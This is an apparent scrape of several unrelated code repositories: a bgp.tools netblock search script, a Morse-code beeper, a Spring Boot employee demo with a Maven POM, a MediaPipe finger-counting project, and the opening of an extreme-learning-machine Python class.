print('[!] Result | \033[93mIPv4\033[0m\n')
for inetnum in ipv4:
print('\t+ [{}] {}\t ({})'.format(inetnum[2], inetnum[0], inetnum[1]))
print('\n[!] Result | \033[93mIPv6\033[0m\n')
for inetnum in ipv6:
print('\t+ [{}] {}\t ({})'.format(inetnum[2], inetnum[0], inetnum[1]))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='A small script which allows to search for netblocks on bgp.tools')
parser.add_argument('-s', '--search', required=True, help='search string, e.g. "DoD"')
args = parser.parse_args()
if args.search:
print('[-] Requesting data for {} ..'.format(args.search))
search(args.search)
print('\n[-] Finished! Good bye ..')
<file_sep>/README.md
## BGP Search
A Python wrapper for searching on https://bgp.tools. Useful for recon.
- Requires "BeautifulSoup"
```
pip3 install bs4
```
**Usage**
```
python3 bgp_search.py [-h] -s SEARCH
A small script which allows to search for netblocks on bgp.tools
optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
search string, e.g. "DoD"
```
**Output**
```
$ python3 bgp_search.py -s "DoD"
---
[!] Result | IPv4
+ 192.168.3.11/24 (DoD Network Information Center)
+ 172.16.58.3/24 (DoD Network Information Center)
+ 172.16.17.32/23 (DoD Network Information Center)
+ 172.16.31.10/24 (DoD Network Information Center)
+ 172.16.58.3/24 (DoD Network Information Center)
+ 172.16.58.3/24 (DoD Network Information Center)
...
```
| 89c3f739e9aa9bd7b0b942423ca97bb4e03f8268 | [
"Markdown",
"Python"
] | 2 | Python | ActorExpose/bgp-search | 727056b0855633a88b8c4fed2a8837567c1829fc | a3bb7e29a375a1964af3853f6ed89633eee90bb0 |
refs/heads/main | <file_sep># Morse-Code-Sound<file_sep>import winsound
import json
import time
TIME_UNIT = 200 #ms
FREQUENCY = 1000
def play_morse_code(text=None, file_path=None, TIME_UNIT=200, FREQUENCY=1000):
if text:
words = [i.strip().split(' ') for i in text.split('\n')]
elif file_path:
words = [i.strip().split(' ') for i in open('text.txt', 'r').readlines()]
else:
raise ValueError('No text or file specified')
with open('translator.json', 'r') as file:
translator = json.load(file)
for row in words:
for word in row:
print(f'new word: {word}')
for char in word:
char_morse_code = translator[char.lower()]
print(char, char_morse_code)
for char in char_morse_code:
winsound.Beep(FREQUENCY, (1 if char == '.' else 3)*TIME_UNIT)
time.sleep(TIME_UNIT/1000)
time.sleep((TIME_UNIT*3)/1000)
time.sleep((TIME_UNIT*7)/1000)
#play_morse_code(text='sos', TIME_UNIT=150, FREQUENCY=500)
| 89763987936dfd5a727c35c765624c6f81467f7a | [
"Markdown",
"Python"
] | 2 | Markdown | erencan-02/Morse-Code-Sound | c8ef543fcd3d220d77a96931ca05a504c29c98ed | 9d685c0ec89feee7fa7cdfd22e76ace7943c3b5b |
refs/heads/master | <file_sep>package com.example.myspringdemo;
/*
@RunWith(SpringRunner.class)
@SpringBootTest
public class MySpringDemoApplicationTests {
@Test
public void contextLoads() {
}
}
*/<file_sep>package com.example.myspringdemo.service;
import com.example.myspringdemo.entity.Officer;
import java.sql.Date;
import java.util.List;
public interface OfficerService {
Officer addOfficer(Officer officer);
void delete (long id);
Officer getByFullName(String FullName);
Officer editOfficer (Officer officer);
List<Officer> getAll();
List<Officer>findByFullName(String FullName);
List<Officer>findByDateOfBirthGreaterThan(Date date);
List<Officer>findByDateReceivedGreaterThan(Date date);
List<Officer>findByDateOfDismissalGreaterThan(Date date);
List<Officer>findByPositionLike(String name);
List<Officer>findByDepartmentLike(String name);
void save(Officer o1);
}
<file_sep>package com.example.myspringdemo.repository;
/*
@Repository
public interface PositionRepository extends CrudRepository<Position, Long> {
List<Position> findByNameOfPosition(String name);
}
*/<file_sep>package com.example.myspringdemo.repository;
import com.example.myspringdemo.entity.Department;
import org.springframework.data.jpa.repository.JpaRepository;
import java.util.List;
//@Repository
public interface DepartmentRepository extends JpaRepository<Department, Long> {
List<Department> findByNameOfDepartmentStartsWithIgnoreCase(String nameOfDepartment);
}
<file_sep>package com.example.myspringdemo.entity;
import javax.persistence.*;
@Entity
@Table(name = "DEPARTMENT")
public class Department {
@Id
@GeneratedValue
//@Column(name = "Id",nullable = false)
private Long id;
//@Column(name = "NameOfDepartment",length = 100,nullable = false)
private String nameOfDepartment;
public Department(String nameOfDepartment, String s){
}
public Department(String nameOfDepartment){
this.nameOfDepartment = nameOfDepartment;
}
public Long getId(){
return id;
}
//public void setId(Long id){this.id=id;}
public String getNameOfDepartment(){
return nameOfDepartment;
}
public void setNameOfDepartment(String nameOfDepartment){
this.nameOfDepartment = nameOfDepartment;
}
@Override
public String toString(){
return String.format("Department[id=%d, nameOfDepartment]",id, nameOfDepartment);
}
}
<file_sep>package com.example.myspringdemo.service;
import com.example.myspringdemo.entity.Department;
import java.util.List;
public interface DepartmentService {
Department addDepartment(Department department);
void delete (long id);
Department getByNameOfDepartment(String FullName);
Department editDepartment (Department department);
List<Department> getAll();
}
<file_sep><?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.1.6.RELEASE</version>
<relativePath/> <!-- lookup parent from com.example.myspringdemo.dao -->
</parent>
<groupId>com.example</groupId>
<artifactId>myspringdemo</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>
<name>myspringdemo</name>
<description>Demo project for Spring Boot</description>
<properties>
<spring.boot.version>2.1.6.RELEASE</spring.boot.version>
<spring.mvc.version>5.1.8.RELEASE</spring.mvc.version>
<hibernate.version>5.4.3.Final</hibernate.version>
<java.version>1.8</java.version>
<spring.data>1.3.4.RELEASE</spring.data>
<javax.servlet>3.0.1</javax.servlet>
<!-- <hb.manager>4.2.5.Final</hb.manager>-->
<hb.manager>5.3.10.Final</hb.manager>
<spring.test>3.2.4.RELEASE</spring.test>
<junit.version>4.11</junit.version>
<version.vaadin>13.0.11</version.vaadin>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
</properties>
<dependencies>
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
<version>${javax.servlet}</version>
<scope>compile</scope>
<!--
<scope>provided</scope>
-->
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<version>${spring.boot.version}</version>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-tomcat</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jetty</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-rest</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-hateoas</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jdbc</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jersey</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web-services</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-webflux</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.data</groupId>
<artifactId>spring-data-rest-hal-browser</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.session</groupId>
<artifactId>spring-session-jdbc</artifactId>
<version>2.1.7.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-webmvc</artifactId>
<version>${spring.mvc.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>io.projectreactor</groupId>
<artifactId>reactor-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<scope>runtime</scope>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-entitymanager</artifactId>
<version>5.4.3.Final</version>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-core</artifactId>
<!-- <version>${hb.manager}</version> -->
<version>5.4.3.Final</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-bom</artifactId>
<version>13.0.11</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-button-flow</artifactId>
<version>2.0.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-notification-flow</artifactId>
<version>2.0.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-ordered-layout-flow</artifactId>
<version>2.0.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>flow-server</artifactId>
<version>2.0.4</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-grid-flow</artifactId>
<version>4.0.2</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>flow-data</artifactId>
<version>1.2.3</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-icons-flow</artifactId>
<version>1.2.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-text-field-flow</artifactId>
<version>1.2.1</version>
</dependency>
<!--
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-spring</artifactId>
<version>10.1.1</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-spring-boot-starter</artifactId>
<version>13.0.11</version>
</dependency>
-->
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-spring-boot-starter</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<!-- vaadin4spring https://github.com/peholmst/vaadin4spring
contains lots of handy helpers for serious Spring + Vaadin
applications. This example uses event bus to decouple the editor
form from the MainUI class.
-->
<dependency>
<groupId>org.vaadin.spring.extensions</groupId>
<artifactId>vaadin-spring-ext-boot</artifactId>
</dependency>
<dependency>
<groupId>org.vaadin.spring.addons</groupId>
<artifactId>vaadin-spring-addon-eventbus</artifactId>
</dependency>
<dependency>
<groupId>org.vaadin</groupId>
<artifactId>viritin</artifactId>
</dependency>
<!-- Using Vaadin add-ons with client side extensions is easy, switch
as an example in this project, see also vaadin-maven-plugin
configuration.
-->
<dependency>
<groupId>org.vaadin.teemu</groupId>
<artifactId>switch</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jdbc</artifactId>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<scope>runtime</scope>
</dependency>
<dependency>
<groupId>org.liquibase</groupId>
<artifactId>liquibase-core</artifactId>
<version>3.7.0</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-devtools</artifactId>
<optional>true</optional>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>flow-spring-addon</artifactId>
<version>1.0.0.beta7</version>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-bom</artifactId>
<version>${version.vaadin}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>org.vaadin.spring.extensions</groupId>
<artifactId>vaadin-spring-ext-boot</artifactId>
<version>2.0.0.RELEASE</version>
</dependency>
<dependency>
<groupId>org.vaadin.spring.addons</groupId>
<artifactId>vaadin-spring-addon-eventbus</artifactId>
<version>2.0.0.RELEASE</version>
</dependency>
<dependency>
<groupId>org.vaadin</groupId>
<artifactId>viritin</artifactId>
<version>2.8</version>
</dependency>
<dependency>
<groupId>org.vaadin.teemu</groupId>
<artifactId>switch</artifactId>
<version>3.0.0</version>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
<plugin>
<groupId>org.liquibase</groupId>
<artifactId>liquibase-maven-plugin</artifactId>
<version>3.6.3</version>
<configuration>
<propertyFile>src/main/resources/application.yml</propertyFile>
</configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<configuration>
<source>1.8</source>
<target>1.8</target>
</configuration>
</plugin>
<!-- Using client side Vaadin add-ons (Switch in this example)
require a custom built "widgetset". Vaadin maven plugin does
that automatically, here using a handy cloud service with CDN
hosting.
-->
<plugin>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-maven-plugin</artifactId>
<version>${version.vaadin}</version>
<executions>
<execution>
<goals>
<!-- Needed for theme: -->
<goal>update-widgetset</goal>
<goal>compile</goal>
<!-- Needed for theme: -->
<goal>update-theme</goal>
<goal>compile-theme</goal>
</goals>
</execution>
</executions>
<configuration>
<!-- Use local as value here for local widgetset compilation -->
<widgetsetMode>cdn</widgetsetMode>
</configuration>
</plugin>
</plugins>
</build>
<repositories>
<repository>
<id>vaadin-addons</id>
<url>http://maven.vaadin.com/vaadin-addons</url>
</repository>
</repositories>
</project>
<file_sep>package com.example.myspringdemo.service.impl;
import com.example.myspringdemo.repository.OfficerRepository;
import com.example.myspringdemo.entity.Officer;
import com.example.myspringdemo.service.OfficerService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.sql.Date;
import java.util.List;
@Service
public class OfficerServiceImpl implements OfficerService {
@Autowired
private OfficerRepository officerRepository;
@Override
public Officer addOfficer(Officer officer){
Officer savedOfficer = officerRepository.save(officer);
return savedOfficer;
}
@Override
public void delete(long id) {
officerRepository.deleteById(id);
}
@Override
public Officer getByFullName(String FullName) {
return (Officer) officerRepository.findByFullName(FullName);
}
@Override
public Officer editOfficer(Officer officer) {
return officerRepository.save(officer);
}
@Override
public List<Officer> getAll() {
return (List<Officer>) officerRepository.findAll();
}
@Override
public List<Officer> findByFullName(String FullName) {
return null;
}
@Override
public List<Officer> findByDateOfBirthGreaterThan(Date date) {
return null;
}
@Override
public List<Officer> findByDateReceivedGreaterThan(Date date) {
return null;
}
@Override
public List<Officer> findByDateOfDismissalGreaterThan(Date date) {
return null;
}
@Override
public List<Officer> findByPositionLike(String name) {
return null;
}
@Override
public List<Officer> findByDepartmentLike(String name) {
return null;
}
@Override
public void save(Officer o1) {
}
}
<file_sep>package com.example.myspringdemo.entity;
import org.hibernate.annotations.GenericGenerator;
import javax.persistence.*;
import java.util.Date;
@Entity
@Table(name="OFFICER")
public class Officer {
@Id
@GeneratedValue (generator = "increment")
@GenericGenerator(name="increment",strategy ="increment")
@Column(name="Id",nullable = false)
private Long id;
@Column(name="FullName")
private String fullName;
public Officer(){
}
public Officer(String fullName){
this.fullName = fullName;
}
public Long getId(){
return id;
}
public void setId(Long id){
this.id=id;
}
public String getFullName(){
return fullName;
}
public void setFullName(String fullName) {this.fullName = fullName;}
@Temporal(TemporalType.DATE)
@Column(name = "DateOfBirth")
private Date dateOfBirth;
@Temporal(TemporalType.DATE)
@Column(name="DateReceived")
private Date dateReceived;
@Temporal(TemporalType.DATE)
@Column(name="DateOfDesmissal")
private Date dateOfDismissal;
@Column(name = "POSITION")
private String position;
@Column(name = "DEPARTMENT")
private String department;
public Date getDateOfBirth() {
return dateOfBirth;
}
public void setDateOfBirth(Date dateOfBirth) {
this.dateOfBirth = dateOfBirth;
}
public Date getDateReceived(){
return dateReceived;
}
public void setDateReceived(Date dateReceived){
this.dateReceived = dateReceived;
}
public Date getDateOfDismissal(){
return dateOfDismissal;
}
public void setDateOfDismissal(Date dateOfDismissal){
this.dateOfDismissal = dateOfDismissal;
}
public String getPosition(){
return position;
}
public void setPosition(String position) {
this.position = position;
}
public String getDepartment(){
return department;
}
public void setDepartment(String department){
this.department = department;
}
}
<file_sep>package com.example.myspringdemo;
import com.vaadin.flow.data.binder.HasItems;
public interface HasFilterableDataProvider<T,F>
extends HasItems<T> {
}
| 5bc50b62cb8edc70c7e17de54446b4aedd85321f | [
"Java",
"Maven POM"
] | 10 | Java | seyseven/myspringdemo | 49e74499c7adff48ad2f9908d5b65ebdb0dccf49 | cff7fcea5a0cbfe892f3de70c48cb9a0c72b036f |
refs/heads/main | <file_sep>import mediapipe as mp
import time
import cv2
class handDetector():
    """Thin wrapper around MediaPipe Hands: detects hands in BGR frames and
    reports landmark positions in pixel coordinates."""

    def __init__(self, mode=False, is_authenticated=True, maxHands=2,
                 detection_confidence=0.5, tracking_confidence=0.5):
        # Keep the configuration around, then build the MediaPipe pipeline.
        self.mode = mode
        self.maxHands = maxHands
        self.detection_confidence = detection_confidence
        self.tracking_confidence = tracking_confidence
        self.mp_hands = mp.solutions.hands
        self.hands = self.mp_hands.Hands(self.mode, self.maxHands,
                                         self.detection_confidence,
                                         self.tracking_confidence)
        self.mp_draw = mp.solutions.drawing_utils

    def Find_hands(self, img, draw=True):
        """Run hand detection on one frame; optionally draw the hand skeleton.

        Stores the raw MediaPipe result in ``self.results`` for later use by
        ``Find_position`` and returns the (possibly annotated) frame.
        """
        # MediaPipe expects RGB input while OpenCV captures BGR.
        frame_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        self.results = self.hands.process(frame_rgb)
        detected = self.results.multi_hand_landmarks
        if detected:
            for single_hand in detected:
                if draw:
                    self.mp_draw.draw_landmarks(img, single_hand,
                                                self.mp_hands.HAND_CONNECTIONS)
        return img

    def Find_position(self, img, hand_no=0, draw=True):
        """Return ``[id, x, y]`` pixel coordinates for every landmark of the
        hand at index ``hand_no`` (empty list when no hand was detected).

        Requires ``Find_hands`` to have been called first on this frame.
        """
        self.land_mark_list = []
        if self.results.multi_hand_landmarks:
            chosen = self.results.multi_hand_landmarks[hand_no]
            for mark_id, mark in enumerate(chosen.landmark):
                # Landmark coordinates are normalised; scale to pixel space.
                height, width, _channels = img.shape
                px, py = int(mark.x * width), int(mark.y * height)
                self.land_mark_list.append([mark_id, px, py])
                if draw:
                    cv2.circle(img, (px, py), 5, (255, 55, 55), cv2.FILLED)
        return self.land_mark_list
def main():
    """Webcam demo: detect hands, print the thumb-tip position, show FPS."""
    last_tick = 0
    capture = cv2.VideoCapture(0)
    detector = handDetector()
    while True:
        _ok, frame = capture.read()
        frame = detector.Find_hands(frame)
        positions = detector.Find_position(frame)
        # Landmark 4 is the last entry reported for the thumb.
        if len(positions) != 0:
            print(positions[4])
        now = time.time()
        fps = 1 / (now - last_tick)
        last_tick = now
        cv2.putText(frame, str(int(fps)), (10, 70),
                    cv2.FONT_HERSHEY_PLAIN, 3, (200, 0, 0), 3)
        cv2.imshow("Image", frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    cv2.destroyAllWindows()
# Run the webcam demo only when this file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()
<file_sep>7# -*- coding: utf-8 -*-
"""
Created on Sun May 2 00:18:16 2021
@author: vrush
"""
import cv2
import mediapipe as mp
import time

# Minimal MediaPipe Hands demo: read frames from the default webcam, draw a
# dot on every hand landmark plus the hand skeleton, and overlay the live FPS.

mp_hands = mp.solutions.hands
previous_time = 0
current_time = 0
vid = cv2.VideoCapture(0)   # default webcam
hands = mp_hands.Hands()    # default detection/tracking settings
mp_draw = mp.solutions.drawing_utils

while(True):
    success, img = vid.read()
    # MediaPipe expects RGB input while OpenCV captures BGR.
    img_RGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    results = hands.process(img_RGB)
    print(results.multi_hand_landmarks)
    if results.multi_hand_landmarks:
        for hand_marks in results.multi_hand_landmarks:
            for id, land_mark in enumerate(hand_marks.landmark):
                #print(id, land_mark)
                # Landmark coordinates are normalised [0, 1]; scale to pixels.
                h, w, c = img.shape
                center_x, center_y = int(land_mark.x*w), int(land_mark.y*h)
                print(id, center_x, center_y)
                #if id ==0:
                cv2.circle(img, (center_x, center_y), 4, (255, 55, 55), cv2.FILLED)
            mp_draw.draw_landmarks(img, hand_marks, mp_hands.HAND_CONNECTIONS)
    # FPS from the wall-clock gap between consecutive frames.
    current_time = time.time()
    fps = 1 / (current_time - previous_time)
    previous_time = current_time
    cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3, (200, 0, 0), 3)
    cv2.imshow("Image", img)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

cv2.destroyAllWindows()
<file_sep># Hand-Detection
This project contains code for hand detection. It uses a hand-landmark model and does not require a GPU. The detection pipeline is built with OpenCV: OpenCV captures the video frames, and the model places numbered landmarks at key positions (the joints) of the hand. Images named 0 to 6 are loaded from disk with Python, and a simple prediction step matches the number of raised fingers to the corresponding image number, so when the hand shows a count, OpenCV displays the matching image on screen.
<file_sep>import time
import mediapipe as mp
import os
import cv2
class handDetector():
    """Locates hands with MediaPipe and reports landmark pixel positions."""

    def __init__(self, mode=False, is_authenticated=True, maxHands=2,
                 detection_confidence=0.5, tracking_confidence=0.5):
        """Configure and create the underlying MediaPipe Hands pipeline."""
        self.mode = mode
        self.maxHands = maxHands
        self.detection_confidence = detection_confidence
        self.tracking_confidence = tracking_confidence
        self.mp_hands = mp.solutions.hands
        self.hands = self.mp_hands.Hands(
            self.mode, self.maxHands,
            self.detection_confidence, self.tracking_confidence)
        self.mp_draw = mp.solutions.drawing_utils

    def Find_hands(self, img, draw=True):
        """Detect hands in a BGR frame; optionally draw the landmark graph."""
        # Convert BGR -> RGB before handing the frame to MediaPipe.
        self.results = self.hands.process(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
        if self.results.multi_hand_landmarks:
            for one_hand in self.results.multi_hand_landmarks:
                if draw:
                    self.mp_draw.draw_landmarks(
                        img, one_hand, self.mp_hands.HAND_CONNECTIONS)
        return img

    def Find_position(self, img, hand_no=0, draw=True):
        """Collect ``[index, x_px, y_px]`` for each landmark of one hand.

        Uses the detection produced by the last ``Find_hands`` call; returns
        an empty list when nothing was detected.
        """
        self.land_mark_list = []
        if self.results.multi_hand_landmarks:
            target = self.results.multi_hand_landmarks[hand_no]
            for idx, lm in enumerate(target.landmark):
                # Scale the normalised coordinates into this frame's pixels.
                rows, cols, _depth = img.shape
                x_px, y_px = int(lm.x * cols), int(lm.y * rows)
                self.land_mark_list.append([idx, x_px, y_px])
                if draw:
                    cv2.circle(img, (x_px, y_px), 5, (255, 55, 55), cv2.FILLED)
        return self.land_mark_list
# ---- Finger-counting demo -------------------------------------------------
# Counts raised fingers on the webcam feed and pastes a matching picture
# (loaded from the "nu" folder) into the corner, plus the count and live FPS.

wCam , hCam = 640, 480

cap = cv2.VideoCapture(0)
cap.set(3, wCam)   # property 3 = frame width
cap.set(4, hCam)   # property 4 = frame height

# Load every overlay image from the folder, in os.listdir order.
folder_path = "nu"
my_list = os.listdir(folder_path)
print(my_list)
over_lay_list=[]
for img_path in my_list:
    image = cv2.imread(f'{folder_path}/{img_path}')
    print(f'{folder_path}/{img_path}')
    over_lay_list.append(image)
print(len(over_lay_list))
print(len(over_lay_list))

previous_time = 0
detector = handDetector(detection_confidence=0.5)

# Landmark ids of the five fingertips (thumb, index, middle, ring, pinky).
Tip_IDS= [4, 8,12, 16,20]

while True:
    success, img = cap.read()
    img = detector.Find_hands(img)
    landmark_List = detector.Find_position(img,draw = False)
    if len(landmark_List)!=0 :
        # One entry per finger: 1 = raised, 0 = folded.
        Figures = []
        # Thumb: compare tip x to the joint just below it. NOTE(review):
        # this x-comparison presumably assumes one specific hand/orientation
        # facing the camera -- confirm handedness before relying on it.
        if landmark_List[Tip_IDS[0]][1]>landmark_List[Tip_IDS[0]-1][1]:
            Figures.append(1)
        else :
            Figures.append(0)
        # Other four fingers: raised when the tip is above (smaller y than)
        # the joint two landmarks below it.
        for id in range(1,5):
            if landmark_List[Tip_IDS[id]][2]<landmark_List[Tip_IDS[id]-2][2]:
                Figures.append(1)
            else :
                Figures.append(0)
        total_figure= Figures.count(1)
        print(total_figure)
        # Paste the overlay image for this count into the top-left corner.
        h, w, c = over_lay_list[total_figure-0].shape
        img[0:h,0:w]=over_lay_list[total_figure-0]
        # Big green box with the numeric count.
        cv2.rectangle(img,(20,225),(170,425),(0,255,0),cv2.FILLED)
        cv2.putText(img, str(total_figure), (45,375), cv2.FONT_HERSHEY_PLAIN,10,(255,89,45),25)
    # FPS from the wall-clock gap between consecutive frames.
    current_time = time.time()
    fps = 1 / (current_time-previous_time)
    previous_time = current_time
    cv2.putText(img, f'FPS: {int(fps)}',(400, 55), cv2.FONT_HERSHEY_PLAIN , 3, (255,12,12),3)
    cv2.imshow("Image",img)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cv2.destroyAllWindows()
"Markdown",
"Python"
] | 4 | Python | vrushankdhande/Hand-Detection- | df6aa8c1a8e5d6c90ee20a08d31875c5af277bea | 65f52aa7a9f2cb6aad211e264c20244d838795d7 |
refs/heads/master | <file_sep>#!/bin/bash
#$ -q AL
#$ -pe smp 1
OMP_NUM_THREADS=1 python /Users/akusok/Dropbox/Documents/X-ELM/hpelm/datasets/benchmark.py $1
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
import numexpr as ne
from tables import open_file
from scipy.spatial.distance import cdist
from scipy.linalg import solve as cpu_solve
from multiprocessing import Pool, cpu_count
import cPickle
import os, platform
def cd(a):
x, w, kind, idx = a
return cdist(x, w, kind)**2, idx
class SLFN(object):
"""Single-hidden Layer Feed-forward Network.
"""
def __init__(self, inputs, targets, batch=100, accelerator=""):
"""Initializes a SLFN with an empty hidden layer.
:param inputs: number of features in input samples (input dimensionality)
:param outputs: number of simultaneous predicted outputs
"""
assert isinstance(inputs, (int, long)), "Number of inputs must be integer"
assert isinstance(targets, (int, long)), "Number of outputs must be integer"
assert batch > 0, "Batch should be positive"
self.inputs = inputs
self.targets = targets
# cannot use a dictionary for neurons, because its iteration order is not defined
self.neurons = [] # list of all neurons with their types (= transformantion functions)
self.Beta = None
self.flist = ("lin", "sigm", "tanh", "rbf_l1", "rbf_l2", "rbf_linf")
self.alpha = 1E-9 # normalization for H'H solution
self.batch = int(batch) # smallest batch for batch processing
self.accelerator = None # None, "GPU", "PHI"
if accelerator == "GPU":
self.accelerator = "GPU"
self.magma_solver = __import__('acc.gpu_solver', globals(), locals(), ['gpu_solve'], -1)
print "using GPU"
# init other stuff
self.opened_hdf5 = []
self.classification = None # c / wc / mc
self.weights_wc = None
self.tprint = 5
def __del__(self):
"""Close HDF5 files opened during HPELM usage.
"""
if len(self.opened_hdf5) > 0:
for h5 in self.opened_hdf5:
h5.close()
def _checkdata(self, X, T):
"""Checks data variables and fixes matrix dimensionality issues.
"""
if X is not None:
if isinstance(X, basestring): # open HDF5 file
try:
h5 = open_file(X, "r")
self.opened_hdf5.append(h5)
for node in h5.walk_nodes():
pass # find a node with whatever name
X = node
except:
raise IOError("Cannot read HDF5 file at %s" % X)
else:
# assert isinstance(X, np.ndarray) and X.dtype.kind not in "OSU", "X must be a numerical numpy array"
if len(X.shape) == 1:
X = X.reshape(-1, 1)
assert len(X.shape) == 2, "X must have 2 dimensions"
assert X.shape[1] == self.inputs, "X has wrong dimensionality: expected %d, found %d" % (self.inputs, X.shape[1])
if T is not None:
if isinstance(T, basestring): # open HDF5 file
try:
h5 = open_file(T, "r")
self.opened_hdf5.append(h5)
for node in h5.walk_nodes():
pass # find a node with whatever name
T = node
except:
raise IOError("Cannot read HDF5 file at %s" % T)
else:
# assert isinstance(T, np.ndarray) and T.dtype.kind not in "OSU", "T must be a numerical numpy array"
if len(T.shape) == 1:
T = T.reshape(-1, 1)
assert len(T.shape) == 2, "T must have 2 dimensions"
assert T.shape[1] == self.targets, "T has wrong dimensionality: expected %d, found %d" % (self.targets, T.shape[1])
if (X is not None) and (T is not None):
assert X.shape[0] == T.shape[0], "X and T cannot have different number of samples"
return X, T
def add_neurons(self, number, func, W=None, B=None):
"""Add neurons of a specific type to the SLFN.
If neurons of such type exist, merges them together.
:param number: - number of neurons to add
:param func: - transformation function of those neurons,
"lin", "sigm", "tanh", "rbf_l1", "rbf_l2", "rbf_linf"
or a custom function of type <numpy.ufunc>
:param W: - projection matrix or ("rbf_xx") a list of centroids
:param B: - bias vector or ("rbf_xx") a vector of sigmas
"""
assert isinstance(number, int), "Number of neurons must be integer"
assert func in self.flist or isinstance(func, np.ufunc), "Use standard neuron function or a custom <numpy.ufunc>"
assert isinstance(W, (np.ndarray, type(None))), "Projection matrix (W) must be a Numpy ndarray"
